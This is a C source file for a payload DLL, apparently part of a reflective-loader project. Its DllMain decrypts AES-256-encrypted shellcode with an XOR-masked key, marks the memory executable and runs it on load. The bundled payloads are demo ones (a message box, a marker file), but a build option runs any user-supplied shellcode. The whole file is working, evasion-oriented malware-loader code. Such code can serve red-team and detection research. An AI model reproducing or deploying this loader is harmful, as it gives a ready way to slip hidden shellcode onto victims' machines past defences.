/*
 * stub_dll.c - demo payload DLL for the reflective loader.
 *
 * The DLL is the container for the AES-256-CBC encrypted shellcode:
 * build/payload_sc.h (generated by build.py) carries the ciphertext of the
 * raw .sc blob extracted from dll/shellcode.c plus an XOR-masked key/IV.
 *
 * On DLL_PROCESS_ATTACH DllMain:
 *   1. unmasks the AES-256-CBC key/IV (SC_KEY_X[i] ^ SC_XOR, SC_IV_X[i] ^ SC_XOR)
 *   2. VirtualAlloc's a RW staging buffer, copies the ciphertext in
 *   3. decrypts in place, strips PKCS#7 padding
 *   4. VirtualProtect's the buffer PAGE_EXECUTE_READ
 *   5. calls the shellcode blob at its entry offset (SC_*_ENTRY_OFFSET)
 *   6. VirtualFree's the buffer and volatile-wipes the key/IV
 *
 * Build variants:
 *   default  : force-loads user32.dll (the shellcode resolves MessageBoxA by
 *              walking the PEB module list) then runs the SC_MSGBOX blob
 *   -DMARKER : runs the SC_MARKER blob (writes shellcode_marker.txt, headless)
 *
 * The DLL is a normal mingw PE32+ build: the reflective loader resolves its
 * kernel32 imports at load time. aes.c is compiled in as well so no CRT
 * functions (memcpy/memset) are needed at runtime.
 */
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#include <windows.h>

#include "aes.h"
#include "payload_sc.h"   /* generated: SC_MARKER_ENC/SC_MSGBOX_ENC + key/IV */

static void mem_copy(void *dst, const void *src, size_t n) {
    unsigned char *d = (unsigned char *)dst;
    const unsigned char *s = (const unsigned char *)src;
    while (n--) *d++ = *s++;
}

static void mem_zero_volatile(void *dst, size_t n) {
    volatile unsigned char *d = (volatile unsigned char *)dst;
    while (n--) *d++ = 0;
}

static int run_shellcode(const unsigned char *ct, size_t ct_len, size_t entry_off, const unsigned char key[32], const unsigned char iv[16]) {
    if (!ct || ct_len < 16 || ct_len % 16 != 0) return -1;
    void *buf = VirtualAlloc(NULL, ct_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!buf) return -1;

    mem_copy(buf, ct, ct_len);
    aes256_cbc_decrypt((unsigned char *)buf, ct_len, key, iv);

    size_t sc_len = ct_len;
    if (pkcs7_unpad((unsigned char *)buf, &sc_len) != 0) {
        VirtualFree(buf, 0, MEM_RELEASE);
        return -1;
    }
    if (entry_off >= sc_len) {
        VirtualFree(buf, 0, MEM_RELEASE);
        return -1;
    }

    DWORD old = 0;
    if (!VirtualProtect(buf, sc_len, PAGE_EXECUTE_READ, &old)) {
        VirtualFree(buf, 0, MEM_RELEASE);
        return -1;
    }

    void (*sc_entry)(void) = (void (*)(void))((char *)buf + entry_off);
    sc_entry();               /* runs the decrypted, executable shellcode */

    VirtualFree(buf, 0, MEM_RELEASE);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    (void)hinstDLL;
    (void)lpvReserved;
    if (fdwReason != DLL_PROCESS_ATTACH) return TRUE;

    unsigned char key[32], iv[16];
    for (int i = 0; i < 32; i++) key[i] = (unsigned char)(SC_KEY_X[i] ^ SC_XOR);
    for (int i = 0; i < 16; i++) iv[i]  = (unsigned char)(SC_IV_X[i]  ^ SC_XOR);

#ifdef SC_USER_PRESENT
    /* custom user shellcode supplied to build.py: entry at offset 0 */
    run_shellcode(SC_USER_ENC, SC_USER_ENC_LEN, SC_USER_ENTRY_OFFSET, key, iv);
#elif defined(MARKER)
    run_shellcode(SC_MARKER_ENC, SC_MARKER_ENC_LEN, SC_MARKER_ENTRY_OFFSET, key, iv);
#else
    /* force-load user32.dll so the shellcode's PEB module walk finds it */
    LoadLibraryA("user32.dll");
    run_shellcode(SC_MSGBOX_ENC, SC_MSGBOX_ENC_LEN, SC_MSGBOX_ENTRY_OFFSET, key, iv);
#endif

    mem_zero_volatile(key, sizeof(key));
    mem_zero_volatile(iv, sizeof(iv));
    return TRUE;
}
